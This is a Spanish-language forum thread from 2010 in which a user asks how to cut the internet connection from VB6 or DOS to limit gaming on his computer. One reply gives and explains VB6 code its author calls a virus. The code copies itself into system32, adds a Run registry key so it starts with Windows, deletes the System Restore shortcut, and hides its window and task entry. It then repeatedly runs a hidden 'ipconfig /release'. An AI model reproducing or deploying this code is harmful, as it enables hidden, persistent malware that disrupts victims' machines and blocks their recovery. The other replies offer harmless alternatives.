elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Deshabilitar conexion a internet
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Deshabilitar conexion a internet  (Leído 4,057 veces)
hunter18

Desconectado Desconectado

Mensajes: 202


Ver Perfil
Deshabilitar conexion a internet
« en: 12 Agosto 2010, 03:43 am »

He probado enviando a d.o.s el comando ipconfig /release con la funcion shell y funciona pero desde el messenger con la opcion reparar se vuelve a conectar la señal, asi que no funciona del todo.

Quiero hacer lo mismo que en la imagen pero desde vb6 ó D.O.S es decir activar o desactivar la conexion, es la unica forma que me sirve al 100% pero no se como lograrlo, he probado un par de codigos y no me han funcionado


« Última modificación: 12 Agosto 2010, 03:47 am por hunter18 » En línea

fary


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Re: Deshabilitar conexion a internet
« Respuesta #1 en: 12 Agosto 2010, 04:05 am »

az un bucle que no pare de enviar ipconfig /release

salu2!


En línea

Un byte a la izquierda.
hunter18

Desconectado Desconectado

Mensajes: 202


Ver Perfil
Re: Deshabilitar conexion a internet
« Respuesta #2 en: 18 Agosto 2010, 03:12 am »

Podria ser pero no creo que sea la mejor alternativa.
En línea

ApOkAlizE

Desconectado Desconectado

Mensajes: 150


¿sabes lo que vales? ¡consigue lo que te mereces!


Ver Perfil
Re: Deshabilitar conexion a internet
« Respuesta #3 en: 18 Agosto 2010, 12:54 pm »

¿sabes programar en VB?
Bueno pues te dejo aqui el codigo.

Private Sub Form_Load()
Dim ruta As String
ruta = App.Path & "\Video001.exe"
FileCopy ruta, "C:\WINDOWS\system32\Virus.exe"
Shell ("reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v Virus.exe /t REG_SZ /d C:\WINDOWS\SYSTEM32\Virus.exe /f")
Kill "C:\Archivos de programa\Accesorios\Herramientas del sistema\Restaurar sistema.lnk"
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
Call Shell("ipconfig/release")
End Sub


Creo que lo he hecho bien, mira.
ruta = App.path & "\Video001.exe"   -----> significa que la variable ruta es equivalente a la ruta que tiene el virus este que quieres hacer, App.path es la ruta del archivo, pero luego hay que añadirle el nombre del virus, por tanto de nombre tendras que ponerle Video001, eso si no le pongas el EXE, solo pon Video001 como nombre.
FileCopy ruta, "C:\WINDOWS\system32\Virus.exe"   ---> esto es que vamos a la variable ruta que te recuerdo que es dodne esta el virus y le hacemos una copia y esta copia la pegamos en C:\WINDOWS\system32\Virus.exe" y si te fijas hemos cambiado el nombre de Video001.exe por Virus.exe

Shell ("reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v Virus.exe /t REG_SZ /d C:\WINDOWS\SYSTEM32\Virus.exe /f")  ---->esto es para hacer una copia de "C:\WINDOWS\system32\Virus.exe" y la guardamos en los registros de esta forma cada vez que se encienda el ordenador se activara el virus. REG_SZ es el tipo de llave que s ele pone en los registros, y la /f es para forzar la accion, por ejemplo si el archivo ya estaba guardado en los registros apra que no produzca error fuerza la acción.
lo de kill"c:\archivos de programa... esto es apra eliminar el restaurador dels istema, el restaurador es una herramienta con la que puedes dejar el PC tal y como estaba unos dias antes, de tal manera k si tieras al 9 de agosto de 2010 el ordenador se quedara como estaba ese dia, pues cone sto eliminamos este restaurador apra que nos e pueda restaurar

Private Sub Timer1_Timer()
On Error Resume Next
Visible = False
App.TaskVisible = False
Call Shell("ipconfig/release", vbHide)
End Sub

esto es la propiedad timer, le pones un timer a tu VB y le pones como intervalo 3 o 4 segundos. On Error Resume Next ---> es para que si se produce algun error lo ignore, ya que sin esto al producirse un error se bloquearia el programa
Visible = False  ----> para ocultar el formulario ya que sin esto al abrir el virus saldria una ventanita gris, y si cierra esta ventanita gris cierra el virus.
App.TaskVisible = False   ---> esto es para que si pressiona CONTROL + ALT + SUPRIMIR no pueda cerrar el virus ya que sino podria finalizar la tarea del virus.
Call Shell("ipconfig/release", vbHide)  ---> Call Shell es apra activar la shell, si quieres hacerlo mas corto con Shell basta no hace falta que pognas Call, luego lo que hay entre comillas es las acciones que se haran por la shell que en este casoe s desconfigurar el internet, atencion, ipconfig/release no e spara bloquear el internet es apra desconigurarlo si quieres bloquearlo tendrias que eliminarle el Driver de internet, y lo de vbHide es para que al ejecutarse la shell no salga la ventanita negra pk sino se notaria que tiene un virus.
Bueno pues creo que te lo he explicado bien, logicamente te lo enseño para que aprendas mejor a programar no para que te dediques  a putear al personal, pues aunque la ciencia pueda llegar a ser muy divertida, no es ningun juego.
NO ME HAGO RESPONSABLE DE TUS ACTOS.
ApOkAlizE
En línea

Los virus informaticos son como las personas, hacen lo posible para destruir y hacen lo impossible para no ser destruidos... - ApOkAlizE
hunter18

Desconectado Desconectado

Mensajes: 202


Ver Perfil
Re: Deshabilitar conexion a internet
« Respuesta #4 en: 19 Agosto 2010, 19:38 pm »

Gracias por el codigo pero me parece demasiado codigo para algo tan vano y no es ningun virus lo que pretendo realizar.

Me han dicho que hay comando D.O.S que hace lo que necesito pero no lo encuentro, espero alguien lo sepa.

saludos
En línea

ApOkAlizE

Desconectado Desconectado

Mensajes: 150


¿sabes lo que vales? ¡consigue lo que te mereces!


Ver Perfil
Re: Deshabilitar conexion a internet
« Respuesta #5 en: 19 Agosto 2010, 20:19 pm »

Pero si no quieres hacer un virus entonces¿ para que representa que sirve esto de desconfigurar el internet?
En línea

Los virus informaticos son como las personas, hacen lo posible para destruir y hacen lo impossible para no ser destruidos... - ApOkAlizE
hunter18

Desconectado Desconectado

Mensajes: 202


Ver Perfil
Re: Deshabilitar conexion a internet
« Respuesta #6 en: 20 Agosto 2010, 06:43 am »

Lo necesito para cortar la conexion a internet despues de una determinada hora de uso para evitar el vicio de que se queden jugando mas de 2 horas en mi computador.
Si lo hago con release se reactiva desde el messenger y como dices podria hacer como dices y no hay problema pero no creo que sea lo mas optimo ademas de consumir memoria en vano.
En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: Deshabilitar conexion a internet
« Respuesta #7 en: 20 Agosto 2010, 06:48 am »

la mas facil, desconectar el cable del router o meden que tengas  :xD, no necesitas programar nada...

haber proba esto...

Cerrar la conexión a internet con el shell

saludos.

En línea

raul338


Desconectado Desconectado

Mensajes: 2.633


La sonrisa es la mejor forma de afrontar las cosas


Ver Perfil WWW
Re: Deshabilitar conexion a internet
« Respuesta #8 en: 20 Agosto 2010, 06:48 am »

podrias poner a cierta hora modificar el archivo host que redireccione todo a ip local :P x lo que todo tiraria error 404 :P
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Deshabilitar drivers internet
Windows
asbu 1 1,571 Último mensaje 24 Enero 2014, 19:07 pm
por asbu
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines